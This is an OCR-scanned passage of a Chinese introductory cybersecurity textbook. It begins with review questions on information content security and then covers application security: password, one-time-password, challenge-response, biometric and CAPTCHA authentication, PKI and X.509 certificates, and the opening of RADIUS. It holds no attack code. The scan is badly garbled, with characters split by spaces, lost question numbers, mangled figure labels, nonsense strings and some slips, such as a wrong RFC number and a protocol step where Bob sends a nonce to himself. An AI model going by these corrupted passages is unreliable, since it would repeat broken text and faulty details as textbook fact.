3. 你 认为 除 计算 机 技术 之 外 ,还 有 哪些 领域 需要 协同 工作 ,才能 更 好 地 保障 信息 内 
容 的 安全 ? 

4. 对 于 信息 内 容 安 全 ,你 认为 有 哪些 方法 (包括 技术 上 、 管 理 上 ,法 律 上 等 多 个 方面 ) 
可 以 对 信息 内 容 安全 的 隐患 进行 有 效 的 疏导 ? 

5. 你 认为 信息 内 容 安全 威胁 主要 有 哪些 ? 

6. 简要 描述 网 络 信息 内 容 获取 的 理想 流程 。 

7. 网 络 信息 内 容 的 获取 技术 有 哪些 ? 简要 说 明 每 种 网 络 信息 内 容 获取 技术 的 基本 
原理 ,主要 流程 。 

8. 典型 的 信息 内 容 获 取 工 具有 哪些 ?并 简要 说 明 其 原理 。 

9. 试 说 明 如 何 基于 网 络 交 互 重 构 机 制 ,实现 需要 身份 认证 的 动态 网 页 发 布 信 息 
获取 。 
0. 描述 基于 浏览 器 模拟 技术 进行 网 络 媒体 信息 获取 过 程 ,分 析 通 过 网 络 交 互 重 构 
实现 网 络 媒体 信息 获取 的 局 限 性 ,以 及 浏览 器 模拟 技术 在 网 络 媒体 信息 获取 领域 的 优势 。 
1. 简 述 文本 信息 的 特征 选取 方式 ,以 及 常用 的 统计 特征 。 
2. 对 于 音频 信息 内 容 , 基 于 帧 的 特征 有 哪些 ?简要 说 明 每 种 基于 帧 的 音频 特征 的 
3. 常见 的 基于 片段 的 音频 特征 有 哪些 ? 并 简要 说 明 每 种 基于 片段 的 音频 特征 的 定 
4. 简要 说 明 常 见 的 图 像 的 特征 抽取 和 选择 。 
5. 对 于 图 像 信 息 内 容 , 常 见 的 颜色 特征 有 哪些 ”并 对 每 种 图 像 颜色 特征 进行 简要 
说 明 。 


6. 颜色 直方 图 特征 的 主要 优 缺 点 是 什么 ”如 何 改进 该 特征 的 局 限 性 ? 简单 描述 该 
种 改进 方法 的 出 发 点 和 可 能 获得 的 效果 。 

17. 简单 比较 颜色 聚合 矢量 特征 和 颜色 直方 图 特征 在 表达 图 像 特点 方面 的 优势 和 局 
限 性 。 

18. 简 述 纹理 特征 和 边缘 特征 在 图 像 特 点 表达 上 的 异同 。 

19. 简单 比较 最 近邻 分 类 法 和 线性 分 类 法 的 异同 。 
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20. 
21. 
22. 
23. 
. 未 来 将 影响 网 络 和 与 情 监测 与 预警 系统 的 技术 主要 有 哪些? 
25. 
26. 
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请 试 着 使 用 两 种 或 多 种 分 类 方法 提高 分 类 精度 。 

请 简要 说 明 信 息 过 滤 技 术 有 哪些 分 类 与 应 用 。 

网 络 与 情 监测 与 预警 系统 的 核心 功能 主要 包括 哪 几 个 方面 ? 

为 什么 一 般 的 大 搜索 技术 无 法 完全 满足 网 络 与 情 监测 与 预警 系统 的 需求 ? 


简 述 内 容 中 心 网 络 的 架构 有 哪些 基本 组 成 ,并 对 每 一 部 分 进行 简要 介绍 。 
简单 比较 内 容 中 心 网 络 中 层次 命名 和 扁平 命名 的 异同 ,并 分 别 说 明 这 两 种 命名 


方式 的 优 缺 点 。 


27. 


优势 ? 


28. 


与 经 典 的 TCP/IP 网 络 架构 相 比 ,内 容 中 心 网 络 架构 有 哪些 不 同 ? 又 有 哪些 


针对 内 容 中 心 网 络 架 构 的 常见 攻击 有 哪些 ?简要 说 明 每 种 攻击 方式 ,并 说 明 这 


些 攻击 方式 中 哪些 是 专门 针对 内 容 中 心 网 络 的 。 
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应 用 安全 基础 


应 用 安全 是 为 保障 各 种 应 用 系统 在 信息 的 获取 ,存储 、 传 输 和 处 理 各 个 环节 的 安全 所 
涉及 的 相关 技术 的 总 称 。 密 码 技术 是 应 用 安全 的 核心 支撑 技术 ,系统 安全 技术 与 网 络 安 
全 技术 则 是 应 用 安全 技术 的 基础 和 关键 技术 。 应 用 安全 涉及 如 何 防止 身份 或 资源 的 假 
冒 , 未 经 授权 的 访问 ,数据 的 泄露 数据 完整 性 的 破坏 .系统 可 用 性 的 破坏 等 。 主 要 研究 领 
域 包括 : 身份 认证 与 信任 管理 ,访问 控制 .电子 政务 系统 安全 、 电 子 商 务 系统 安全 、 隐 私 保 
护 ` 云 计算 安全 ,大 数据 安全 .区 块 链 安全 .人 工 智能 安全 .工业 互联 网 安全 、 供 应 链 安全 
等 。 本 章 将 就 应 用 安全 的 一 些 重要 和 新 兴 技术 加 以 介绍 和 讨论 。 


”61 应 用 安全 概述 


在 各 类 应 用 服务 系统 中 ,身份 认证 是 保障 应 用 安全 的 基础 ,其 不 仅仅 包括 传统 的 人 的 
身份 认证 ,设备 .软件 等 网 络 实体 都 需要 身份 认证 和 可 信 管 理 。 不 同 场景 .不同 约 束 条 件 
下 需要 采用 多 种 多 样 的 身份 认证 方式 。 

访问 控制 是 应 用 系统 信息 安全 必 不 可 少 的 组 成 部 分 。 随 着 信息 系统 功能 越 来 越 复 
杂 , 跨 系统 协同 操作 越 来 越 普 遍 , 信 息 服务 种 类 越 来 越 多 ,对 数据 、 系 统 功 能 的 访问 控制 策 
略 也 越 来 越 复杂 ,传统 的 自主 访问 控制 模型 .强制 访问 控制 模型 已 不 能 满足 当前 复杂 信息 
系统 的 访问 控制 需求 。 在 基于 角色 的 访问 控制 模型 之 后 又 发 展 出 基于 网 络 空间 的 访问 控 
制 等 多 种 扩展 。 

信息 技术 、 移 动 通信 技术 等 的 紧密 结合 与 快速 发 展 ,以 及 智能 终端 软 硬 件 的 不 断 升 级 
与 换代 ,促进 了 移动 互联 网 、 云 计算 、 大 数据 、 物 联网 等 应 用 的 不 断 普 及 。 以 淘宝 /京东 / 
amazon 为 代表 的 全 球 电 子 商务 、 以 微 信 / 微 博 / 拌 音 / 美 篇 /Facebook/Twitter/Instagram 
为 代表 的 移动 社交 媒体 平台 、 以 携程 / 滴 滴 / 大 众 点 评 / 美 团 /穷游 /airbnb 为 代表 的 住宿 出 
行 、 以 支付 宝 / 微 信 支 付 为 代表 的 移动 支付 等 各 种 移动 互联 网 服务 不 断 涌现 ,并 借助 移动 
网 络 全 面 深 入 到 人 们 生活 工作 的 方方面面 。 在 使 用 丰富 多 样 的 移动 应 用 的 过 程 中 ,用 户 
会 发 布 海量 的 感想 .照片 .视频 .体验 ,点 评 等 多 模 态 社交 媒体 数据 ,同时 也 会 泄露 自身 身 
份 、 人 际 关系 、 位 置 轨迹 、 兴 趣 爱 好 、 经 济 状况 等 个 人 隐私 信息 。 所 发 布 的 隐私 信息 ,从 用 
户 层面 ,会 在 用 户 群 .朋友 圈 之 间 传 播 共 享 。 从 移动 应 用 服务 商 层面 ,一 是 利用 收集 的 数 
据 对 用 户 进 行 精准 画像 ,提供 定制 化 个 性 服务 ;二 是 对 数据 进行 分 析 加 工 , 改 进 自身 系统 
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的 功能 和 性 能 ;三 是 为 获取 进一步 的 收益 ,会 将 用 户 信息 在 自身 不 同 信息 系统 之 间 共 享 、 
在 生态 圈 友 商 系统 间 共 享 。 这些 均 导 致 海量 用 户 个 人 信息 跨 系 统 、 跨 生态 圈 力 至 跨国 境 
流转 常态 化 ,用 户 信息 不 可 避免 地 留存 在 不 同 信 息 系统 。 而 不 同 信息 系统 隐私 保护 意识 
参差 不 齐 ,隐私 保护 策略 千差万别 ,隐私 保护 能 力 强 弱 不 一 ,信息 共享 交换 过 程 中 数据 所 
有 权 、 管 理 权 与 使 用 权 分 离 , 加 大 了 用 户 隐私 泄露 风险 ,严重 威胁 到 用 户 的 隐私 安全 、 企 业 
的 数据 安全 万 至 国家 的 社会 经 济 安全 ,隐私 保护 也 成 为 应 用 安全 关注 的 重点 领域 。 

云 计 算 已 经 成 为 当前 非常 普及 的 一 种 信息 服务 提供 方式 ,为 政府 和 企业 提供 了 新 信 
息 系统 构建 方式 和 计算 方式 ,可 以 提供 高 可 靠 的 信息 和 计算 服务 ,降低 用 户 维护 应 用 系统 
硬件 以 及 安全 的 成 本 。 国 外 的 Amazon、 微 软 以 及 国内 的 阿里 、 腾 讯 、 华 为 目前 提供 的 公 
有 云 服务 已 拥有 大 量 的 客户 ,不仅 服务 于 个 人 用 户 , 也 服务 了 广大 的 企业 用 户 。 云 计算 电 
子 政务 云 也 在 各 地 快速 发 展 。 但 由 于 云 计算 造成 了 数据 所 有 权 和 管理 权 的 分 离 , 人 们 对 
云 计算 在 计算 环境 .服务 保障 数据 安全 方面 仍然 存在 很 多 疑虑 。 因 此 在 云 计算 基础 设施 
的 可 信和 性 、 保 障 云 数据 安全 方面 开展 了 持续 的 研究 ,提出 了 众多 的 安全 技术 和 安全 服务 方 
法 ,对 云 应 用 的 安全 保障 起 到 了 重要 的 促进 作用 。 

工业 互联 网 通过 云 化 的 网 络 平台 把 设备 ,生产 线 、 工 厂 、 供 应 商 、 产 品 和 客户 紧密 地 连 
接 融 合 起 来 ,帮助 制造 业 拉 长 产业 链 , 形 成 跨 设备 、 跨 系统 、 跨 厂区 、 跨 地 区 的 互联 互通 ,从 
而 提高 效率 ,推动 整个 制造 服务 体系 智能 化 ,实现 制造 业 和 服务 业 之 间 的 跨越 发 展 ,使 工 
业经 济 各 种 要 素 资源 能 够 高 效 共享 。 这 其 中 需要 对 各 类 终端 进行 身份 认证 ,以 保证 信息 
来 源 的 可 信 与 真实 。 数 据 汇 集 到 云端 ,要 保证 系统 的 可 靠 运 行 ,需要 保证 数据 的 机 密 性 、 
完整 性 .访问 和 流转 的 可 控 性 以 及 系统 软 硬 件 的 安全 性 。 

物 联网 ,移动 互联 网 和 云 计算 的 飞速 发 展 使 得 海量 的 数据 汇集 到 云端 ,形成 了 大 数据 
(Big Data)。 麦 肯 锡 全 球 研究 所 给 出 的 大 数据 定义 是 一 种 规模 大 到 在 获取 、 存 储 ,管理 、 
分 析 方 面 大 大 超出 了 传统 数据 库 软 件 工具 能 力 范围 的 数据 集合 。 大 数据 本 质 上 是 一 种 方 
法 论 ,是 组 合 分 析 多 源 异 构 的 数据 来 进行 更 好 的 决策 ,获得 的 数据 越 多 越 能 发 现 数据 中 蕴 
含 的 知识 .价值 和 规律 。 因 此 保证 数据 来 源 的 真实 .促进 多 源 数据 的 共享 \ 有 效 挖掘 数据 
的 价值 .保障 数据 所 有 者 的 权益 是 实现 大 数据 安全 应 用 的 关键 ,上 述 技术 实际 上 是 人 工 智 
能 .区 块 链 以 及 网 络 安全 技术 的 融合 交叉 应 用 。 

人 工 智 能 近年 来 快速 发 展 ,在 图 像 识别 .自然 语言 理解 ,知识 发 现 与 数据 挖掘 ,博弈 等 
方面 取得 了 显著 的 成 就 ,在 围棋 领域 ,阿尔 法 Go 已 经 使 人 类 最 顶尖 的 棋 手 胜 机 渺 苇 。 人 
工 智 能 也 被 持续 推动 在 智慧 城市 .自动 驾驶 、 医 疗 诊断 、 在 线 教育 ,芯片 设计 等 领域 广泛 应 
用 。 世 界 各 国 普遍 将 人 工 智能 列 为 国家 发 展 战略 。2017 年 ,我 国 国务 院 印发 (新 一 代 人 

工 智 能 发 展 规划 》, 提 出 了 面向 2030 年 的 我 国 新 一 代 人 工 智 能 发 展 的 指导 思想 .战略 目 
标 、 重 点 任务 和 保障 措施 ,目标 是 构筑 我 国人 工 智能 发 展 的 先 发 优势 ,加 快 建设 创新 型 国 
家 和 世界 科技 强国 。2019 年 7 月 ,美国 更 新 了 《国家 人 工 智 能 研究 发 展 战略 计划 》, 确 定 
了 最 新 的 8 个 人 工 智 能 研发 战略 : 加 持续 对 基础 AI 研究 进行 长 期 投资 ;@ 开 发 人 与 AI 
协作 的 有 效 方法 :G@) 解 决 人工 智 能 中 的 伦理 道德 .法律 和 社会 因素 ;四 确保 AI 系统 的 可 
靠 性 与 安全 性 ;@ 为 AI 训练 和 检测 开发 共享 数据 集 与 环境 ;@ 支 持 开 发 人 工 智能 技术 标 
准 和 相关 工具 ;@ 推 动人 工 智 能 研发 人 员 发 展 ,保持 美国 的 领导 地 位 ;@ 扩 大 公私 合作 伙 
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伴 关系 ,加 速 人 工 智能 的 发 展 。 人 工 智 能 在 训练 阶段 和 推理 阶段 对 数据 的 正确 性 都 有 较 
高 的 要 求 , 同 时 人 工 智 能 技术 也 越 来 越 多 地 应 用 在 网 络 安全 防护 、 密 码 设计 与 分 析 领 域 ， 
人 工 智 能 安全 已 经 成 为 应 用 安全 领域 被 广泛 关注 的 研究 热点 。 

区 块 链 作 为 数字 加 密 货币 -比特 币 的 基础 支撑 技术 ,由 于 去 中 心 化 .不 可 篡改 .可 追溯 
等 特性 在 构建 价值 互联 网 、 建 立新 型 信任 体系 方面 得 到 了 广泛 的 关注 。 区 块 链 在 信息 共 
享 , 版 权 保 护 、 物 流 、 供 应 链 金 融 、 跨 境 支 付 数 字 资 产 .数字 货币 等 领域 的 应 用 也 在 不 断 探 
索 之 中 。 当 然 ,区 块 链 本 身 存 在 共识 时 间 长 ,吞吐 量 受 限 的 缺点 , 随 着 区 块 链 落地 应 用 的 
推进 ,区 块 链 本 身 的 安全 问题 .隐私 保护 问题 也 吸 待 解决 。 同 时 ,区 块 链 对 于 互联 网 信息 
服务 、 金 融 安全 也 带 来 相应 的 风险 。2019 年 ,国家 互联 网 信息 办 公 室 发 布 (区 块 链 信 息 服 
务 管 理 规定 》, 为 区 块 链 信息 服务 提供 有 效 的 法 律 依据 。 同 年 ,中 共 中 央 政 治 局 第 十 八 次 
集体 学 习 指 出 ,要 把 区 块 链 作为 核心 技术 自主 创新 重要 突破 口 ,将 区 块 链 技术 上 升 为 国家 
战略 。 

应 用 安全 涵盖 面 极 广 , 限 于 篇 幅 不 可 能 全 部 涉及 。 在 本 章 的 其 余部 分 将 对 一 些 基 础 
和 重要 的 部 分 进行 介绍 。 
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6.2.1 身份 认证 的 主要 方法 


身份 认证 是 保障 信息 系统 安全 的 第 一 道门 户 。 用 户 在 被 确认 身份 之 后 才 可 以 在 信息 
系统 中 根据 身份 所 具有 的 权限 享受 相应 的 信息 服务 。 身 份 认 证 一 般 分 为 验证 方 和 证 明 
方 , 证 明 方 通过 向 验证 方 证 明 其 拥有 和 其 身份 对 应 的 某 个 秘密 ,来 证 明 其 身份 。 本 节 介 绍 
常用 的 身份 认证 方法 。 


1. 用 户 名 /口令 

每 个 证 明 方 被 分 配 一 个 唯一 的 口令 ,验证 方 保 存 有 证 明 方 的 口令 或 者 口令 的 变换 值 。 
这 个 变换 值 一 般 是 单 向 的 , 即 验 证 方 从 保存 的 口令 变换 值 没 有 办 法 推断 出 口令 本 身 。 这 
样 的 好 处 是 即使 验证 方 受到 攻击 导致 口令 变换 值 泄露 ,攻击 者 也 没有 办 法 推断 出 口令 ,从 
而 提高 系统 的 安全 性 。 常 用 的 变换 方法 是 Hash 函数 。 

用 户 名 口令 认证 是 目前 最 为 常见 的 认证 方法 ,其 简单 易 用 ,不 需要 用 户 拥有 任何 硬件 
设备 ,只 要 牢记 他 的 口令 就 可 以 。 为 了 口令 安全 ,口令 应 该 尽 可 能 地 长 一 些 , 上 且 不 具有 规 
律 性 。 我 们 经 常见 到 网 站 要 求 用 户口 令 不 得 短 于 8 个 字符 ,必须 拥有 至 少 一 个 大 写字 符 、 
一 个 数字 和 一 个 特殊 字符 。 不 同 的 网 站 或 系统 采用 不 同 的 口令 。 口 令 应 该 定期 更 换 。 然 
而 复杂 没有 规律 性 的 口令 难于 记忆 ,很 多 人 通常 对 于 不 同 的 网 站 使 用 相同 的 口令 。 这 会 
带 来 很 大 的 风险 ,如 果 一 个 网 站 的 口令 泄露 ,那么 其 他 网 站 也 将 随 之 泄露 。 

如 何 选择 安全 的 口令 的 一 直 是 学 术 界 研 究 的 热点 。 攻 击 者 可 能 试图 猜测 用 户 的 口令 
进入 用 户 的 邮箱 或 云 盘 以 获取 用 户 的 敏感 数据 .如何 选择 安全 的 .黑客 难以 猜测 的 口令 需 
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要 利用 信息 论 .自然 语言 处 理 等 复杂 的 理论 来 支撑 。 


2. 动态 口令 /一 次 性 口令 (One time password, OTP) 

固定 的 口令 容易 被 攻击 者 获取 ,那么 能 否 用 一 次 性 口令 或 动态 口令 来 减轻 这 种 威胁 
呢 ? 答案 是 肯定 的 。RSA 公司 开发 的 SecurID 广泛 应 用 于 大 型 企业 的 信息 系统 登录 ,如 
图 6-1 所 示 。SecurID 是 一 个 硬件 设备 ,每 分 钟 生成 一 个 新 的 口令 。 系 统 和 每 个 SecurID 
共享 一 个 初始 密 钥 ,然后 随 着 时 间 变 换 ID 和 系统 端 会 随时 间 变 化 同步 的 更 新 口令 。 中 国 
银行 的 网 上 银行 也 采用 了 动态 令 牌 作为 交易 认证 的 方法 。 

基于 时 间 的 动态 口令 需要 令 牌 与 系统 间 保 持 时 间 同 步 。 通 常 在 一 段 时 间 内 (比如 1 
分 钟 ) 动 态 口令 是 一 样 的 ,这 样 在 时 间 段 内 口令 有 可 能 会 被 重用 ,也 有 可 能 失去 同步 。 需 
要 拥有 同步 机 制 。 

动态 口令 或 者 动态 令 牌 实际 上 是 ISO/IEC 9798-2-2008 标准 规定 的 一 轮 认证 协议 。 
Alice 和 Bob 双方 已 经 有 共享 密 钥 K ,一 轮 认 证 协议 如 图 6-2 所 示 。 


1 
A (1) TokenAB B Q 


图 6-1 SecurID 图 6-2 ISO/IEC 9798-2-2008 一 轮 认 证 协议 


TokenAB— Ex, (Taor NA|| B) 
Alice 7^ AERE [8] f T 4 2X 3€ FF l7 N 4 ,连同 Bob 的 身份 标识 B 用 Ks 加 密 , 作 为 认证 
令 牌 发 给 Bob. Bob LAK a ft 8 i B. ,验证 TA 或 者 NA 的 正确 性 。Alice 和 Bob 共享 Ks 之 
外 ,还 要 求 双方 保持 时 间 截 或 者 序列 号 的 同步 。 
OTP 机 制 是 另 一 种 常见 的 动态 口令 认证 机 制 。 比 如 我 们 经 常 应 用 的 短信 验证 码 , 如 
图 6-3 所 示 。 用 户 在 服务 器 注册 了 接收 一 次 性 口令 的 专 有 设备 或 者 专 有 的 邮箱 ,如 短信 、 
邮件 等 。 当 用 户 使 用 浏览 器 或 移动 APP 通过 互联 网 访问 服务 器 时 ,服务 器 通过 向 用 户 手 
机 发 送 短信 ,或 者 用 户 邮箱 发 送 邮件 将 一 次 性 的 认证 码 发 送 给 用 户 。 用 户 收 到 OTP 后 
在 浏览 器 或 APP 中 输入 ,从 而 完成 认证 。 只 要 用 户 手机 或 者 邮箱 的 控制 权 不 丢失 ,就 可 
以 保证 较 高 的 安全 性 。 
1. 登录 请 求 


Q 3. 输入 验证 码 
e 


用 户 


63 ”OTP 认证 协议 
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3. 挑战 应 答 认 证 

动态 口令 认证 可 以 只 需要 从 用 户 到 系统 传递 一 轮 消息 。 为 了 防止 重用 ,要 求 双方 时 
间 同 步 或 者 序列 号 同步 。 挑 战 -应 答 认证 方法 是 通过 一 轮 应 答 实 现 验证 者 对 证 明 者 对 认 
证 ,利用 一 次 性 随机 数 实 现 防 止 重 放 攻 击 。 其 实现 方式 如 图 6-4 所 示 。 


Nonce 


Alice 
x 7 f(K, Nonce) 


图 6-4 挑战 应 答 认证 协议 


验证 者 提出 接 入 请 求 , 验 证 者 向 证 明 者 发 送 一 个 一 次 性 的 随机 数 作为 挑战 。 证 明 者 
利用 单 向 密码 函数 ,以 双方 共享 的 秘密 作为 输入 ,对 随机 数 进行 运算 作为 应 答 。 验 证 者 也 
用 随机 数 和 共享 的 秘密 作为 单 向 函数 的 输入 ,将 计算 出 的 结果 与 证 明 者 返回 的 应 答 进行 
比较 ,如 二 者 一 致 则 认证 通过 。 

对 应 的 ISO/IEC 9798-2—2008 标准 规定 了 如 图 6-5 所 示 的 认证 流程 。 


(1) Rsll Textl 
B (3) 
(2) TokenAB 


图 6-5 ISO/IEC 9798-2—2008 挑战 应 答 认证 协议 


TokenAB—E y, (R5 | | B) 
Bob 向 Alice 发 送 一 次 性 随机 数 Rs ,Alice 用 K 加密 Rs 和 Bob 的 身份 标识 。Bob ft 
密 后 验证 Rg 是否 与 其 发 出 的 一 致 。 
ISO/IEC 9798-3 一 2008 规定 了 采用 公 钥 密码 算法 实施 挑战 应 答 机 制 的 标准 ,如 图 6- 
6 所 示 。Bob 拥有 Alice 公 钥 ,他 可 以 发 送 一 次 性 随机 数 Rg 给 Bob 作为 挑战 ,Alice 用 自 
己 的 私 钥 对 随机 数 Rg 进 行 数字 签名 作为 应 答 ,Bob 以 Alice 的 公 钥 验证 签名 的 正确 性 和 
Rs 的 一 致 性 。 


Nonce 
x'= Ver (PK 4, Nonce) 


x '-True? 


Alice 
x — Sign (SK 4, Nonce) 


6-6 ISO/IEC 9798-3—2008 挑战 应 答 认 证 协议 


如 图 6-7 所 示 的 U 盾 是 一 种 基于 数字 签名 的 实现 挑战 应 答 协议 硬件 设备 ,广泛 应 用 

于 网 上 银行 的 支付 认证 。 大 致 的 工作 流程 是 网 银 客 户 端 软件 会 将 每 次 支付 交易 信息 发 送 

到 与 计算 机 终端 连接 的 U Ji -U 盾 对 交易 以 存储 在 U 盾 中 的 用 户 私 钥 签名 后 返回 计算 
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机 ,并 传递 到 银行 业务 系统 验证 签名 是 否 正确 。 


4. 基于 生物 特征 和 物性 特征 
认证 本 质 上 是 基于 属于 被 认证 者 独一无二 的 特征 的 。 
人 的 生物 特征 正好 满足 这 样 的 要 求 , 因 此 选择 具有 足够 区 
分 度 的 生物 特征 作为 认证 手段 成 为 近年 来 的 热点 ,并 得 到 
越 来 越 多 的 广泛 应 用 。 常 见 的 生物 特征 认证 包括 指纹 、 人 
脸 、 虹 膜 、 声 纹 等 。 选 择 的 生物 特征 应 该 易 采 集 ,区 分 度 
高 。 生 物 特征 认证 的 优点 是 方便 ,用 户 不 用 携带 额外 的 认 
图 6-7 U 盾 证 设备 ,缺点 是 生物 特征 不 可 替换 ,不 可 更 新 。 一 旦 用 户 
生物 特征 被 泄露 或 被 窃取 ,会 给 用 户 带 来 极 大 的 信息 安全 
和 隐私 方面 的 隐患 。 因 此 对 于 生物 特征 采集 、 存 储 和 应 用 的 安全 需要 加 大 保护 力度 。 
生物 特征 认证 与 密码 认证 的 不 同 点 还 在 于 有 识别 准确 率 和 误 识 率 的 折 中 问题 ,这 实 
际 是 安全 性 和 方便 性 的 平衡 ,本 质 是 假设 检验 问题 。 
目前 一 种 常用 的 机 制 是 生物 特征 本 地 保存 ,本 地 比 对 。 远 程 认 证 还 是 采用 密码 协议 ， 
两 种 机 制 相 结合 提供 更 高 安全 性 ,例如 后 面 会 讲 到 的 FIDO。 


5. 图 灵 测 试 

验证 登录 信息 系统 的 是 人 或 自动 化 执行 的 程序 。 采 用 的 方式 是 利用 人 能 快速 回答 ， 
而 机 器 难以 快速 回答 的 问题 。 目 的 是 防范 利用 计算 机 程序 对 系统 进行 暴力 破解 。 经 常 看 
到 的 图 灵 测 试 是 图 形 验证 码 , 如 图 6-8 所 示 ,在 登录 系统 不 仅 要 输入 口令 ,还 要 输入 图 形 
验证 码 。 


仔细 将 拼图 拼合 只 请 点 击 下 图 中 所 有 的 APUE om 
gea x * 
D mn e 


ME PERURAARTESEEIER 
4 立即 登录 
eo20 G 由 极 验 提供 技术 支持 注册 12306 账 号 | 忘记 密码 ? 


(a) 识别 图 形 验证 码 也 ) 完 成 拼图 (9) 选择 正确 的 图 片 
6-8 ” 几 种 不 同形 式 的 图 灵 测 试 方法 


图 灵 测 试 的 安全 性 取决 于 人 工 智能 算法 识别 特定 问题 的 难度 。 包 括 字符 识别 .图 像 
识别 等 , 随 着 深度 学 习 的 技术 发 展 ,图 像 识别 的 准确 率 已 经 接近 甚至 超过 人 类 ,因此 图 灵 
测试 的 方案 需要 不 断 提升 和 改进 。 


6. 多 因子 认证 
单一 的 认证 方法 不 足以 保证 身份 认证 的 安全 性 。 因 此 在 实际 应 用 当中 ,多 采取 多 种 
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认证 方式 结合 ,构成 所 谓 的 多 因子 认证 方式 。 常 见 的 包括 静态 口令 十 短信 验证 码 ,静态 口 
令 十 USBKEY ,口令 十 生物 特征 ,生物 特征 十 公 钥 认证 等 。 


6.2.2” 公 钥 基 础 设施 


公 钥 基础 设施 (Public Key Infrastructure,.PKI) 是 支撑 公 钥 应 用 的 一 系列 安全 服务 
的 集合 。 在 应 用 公 钥 密码 的 时 候 会 面临 下 面 的 问题 : Alice 用 私 钥 进行 数字 签名 的 时 候 ， 
如 果 Bob 要 验证 这 个 签名 ,他 如 何 获得 Alice 的 公 钥 ? 一 种 方法 是 Alice 把 公 钥 直接 发 送 
给 Bob , 另 一 种 方法 是 Alice 将 公 钥 存储 在 公开 的 数据 库 中 ,Bob 从 公开 数据 库 中 获得 
Alice 的 公 钥 。 那么 Bob 如 何 确信 他 所 得 到 的 公 钥 确实 是 Alice 的 公 钥 呢 ? 

为 解决 这 个 问题 ,数字 证 书 (Digital Certificate) 应 运 而 生 。 数 字 证 书 由 Alice 和 Bob 
都 信任 的 权威 第 三 方 颁发 ,将 Alice 的 公 钥 和 Alice 的 身份 绑 定 起 来 。 国 际 电 联 ITU 制 
定 的 X.509 标准 规定 了 证 书 的 格式 ,图 6-9(a) 是 X.509v3 的 证 书 格式 ,图 6-9(b) 是 一 个 实 
际 的 证 书 。 


diet (OU) < > 
Lnd 0/53461639:A4:30:14:126554.1::88:3445:06 
: Coda) 
Version(v3) —R fs (CN) Baltimore CyberTrust Root 
Bakenore 


Serial number IA (OU) CyberTrust 
Signature algorithm id m 

ie 网 2015 征 0 月 MB 
Issue name x 2020910898 
Validity period 
Subject name 
Subject public key info 
Issuer unique identifier 
extensions; 


mu 
SHA-256 Rl 61:72 办 99 4C ME TI- A-0182 0&4 09 0 C 
0357-4219 DI 20.31 1AAT AGAT) CEA. 


SHAVMUR — 695338358 CEF34820.1:874199 C $AEDEEAJB61FA 


signature 


(a) X.509 v3 证 书 格式 (b) 实际 的 X.509 v3 证 书 
6-9 X.509 证 书 


证 书 当 中 的 版 本 号 ,用 于 实现 不 同 版 本 证 书 的 兼容 ;序列 号 是 证 书 的 唯一 标识 ;签名 
算法 标识 符 用 于 说 明证 书签 名 使 用 的 算法 ; 颁发 者 名 称 是 CA 的 名 字 ; 有 效 期 记载 了 证 
书 颁发 的 时 间 和 失效 的 时 间 。 主 体 名 称 记载 了 证 书 持 有 人 的 名 称 ;主体 公 钥 信息 记载 了 
证 书 持 有 人 的 公 钥 。 颁 发 人 唯一 标识 符 用 来 防止 颁发 人 有 重 名 的 情况 。 随 后 是 CA 对 证 
书 的 签名 。 

PKI 的 构成 和 工作 流程 如 图 6-10 所 示 。 用 户 向 注册 权威 机 构 RA 申请 证 书 ,RA 验 
证 用 户 的 身份 后 向 CA 发 出 用 户 证 书 申请 。RA 类 似 于 现实 生活 中 的 派出 所 。CA 为 用 
户 生成 证 书后 将 证 书 颁发 给 用 户 , 同 时 将 证 书 放 到 公共 存储 服务 当中 。CA 还 会 维护 一 

219 


su 网 络 空 间 安 全 导论 c 


个 证 书 撤销 列表 CRL, 用 于 存储 在 证 书 有 效 期 内 私 钥 丢 失 的 证 书 序列 号 ,并 有 CA 的 私 
5144. CA 会 将 CRL 存储 在 公共 服务 中 或 者 推送 到 使 用 证 书 的 第 三 方 用 户 , 比 如 Bob。 


5. CA 发 布 证 书 和 CRL gus 
存储 库 


证 书 和 CRL 存 储 库 


注册 权威 机 构 | _3. RA 为 用 户 请 求证 书 证 书 颁发 机 构 
RA CA 


2.RA 验 i 5a. CA 根据 策略 向 (LDAP 目 录 ) 
vicem 客户 提供 CRL 信 息 
负责 人 /申请 人 4. CA 颁发 证 书 应 用 或 其 他 实体 
1. 用 户 申请 认证 6. 应 用 程序 和 其 他 系统 使 用 证 书 


图 6-10 PKI 工作 流程 


X.509 标准 采用 树 型 的 信任 体系 ,如 图 6-11 所 示 。 根 CA 使 用 自身 的 私 钥 为 自己 签 
发 证 书 ,是 整个 信任 体系 的 锚 点 。 根 CA 为 下 级 CA 颁发 证 书 , 直 到 为 用 户 颁 发 证 书 。 用 
户 Alice 和 Bob 都 信任 其 上 级 CA, 直 到 根 CA, HA Alice 和 Bob 的 证 书 是 由 不 同 CA 
颁发 的 ,他 们 沿 着 信任 路 径 可 以 到 达 相 同 的 证 书 节点 ,那么 
他 们 就 可 以 建立 信任 关系 ,这 类 似 于 我 们 现实 生活 中 的 身份 
证 ,Alice 和 Bob 的 身份 证 假如 分 别 由 北京 和 陕西 公安 部 门 
发 放 , 但 是 他 们 均 信任 公安 部 ,因此 可 以 建立 信任 关系 。 

任何 一 个 使 用 证 书 的 第 三 方 在 验证 证 书 有 效 性 的 时 
候 , 要 执行 以 下 验证 操作 : 

* 证 书 颁发 机 构 是 否 是 其 信任 的 机 构 。 

。 证 书 是 否 在 有 效 期 内 。 

* 证 书 是 否 在 证 书 撤销 列表 当中 。 

图 6-11 X.509 证 书信 任 体系 。 证 书 的 数字 签名 是 否 有 效 。 

所 有 上 述 验 证 通过 以 后 ,用 户 就 可 以 从 证 书 获得 证 书 持 有 人 的 公 钥 ,并 信任 这 个 

A. 


6.2.3 身份 认证 的 主流 标准 


1. RADIUS 

远程 认证 拨 入 业务 协议 RADIUS (Remote Authentication Dial-In User Service 
protocol) 是 由 Livingston 公司 发 明 的 ,用 于 接 人 认证 和 计 费 服务 。RADIUS 规范 文本 可 
以 参看 RFC 2865 和 RFC 2856, 

图 6-12 是 微软 RADIUS 协议 的 工作 流程 。 用 户 通 过 拨号 连 人 网 络 接 人 服务 器 ,网 
络 接 人 服务 器 和 Internet 认证 服务 器 (IAS) 之 间 采 用 RADIUS 协议 通信 。 

(D 用 户 向 NAS 发 起 PPP 认证 协议 。 

Q NAS 提示 用 户 输入 用 户 名 和 口令 (如 果 使 用 口令 认证 协议 PAP) 或 者 挑战 (如 果 
使 用 挑战 握手 认证 协议 CHAP) 。 
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G 用 户 回 复 。 

@ RADIUS 客户 端 向 RADIUS 服务 器 发 送 用 户 名 和 加 密 的 口令 。 

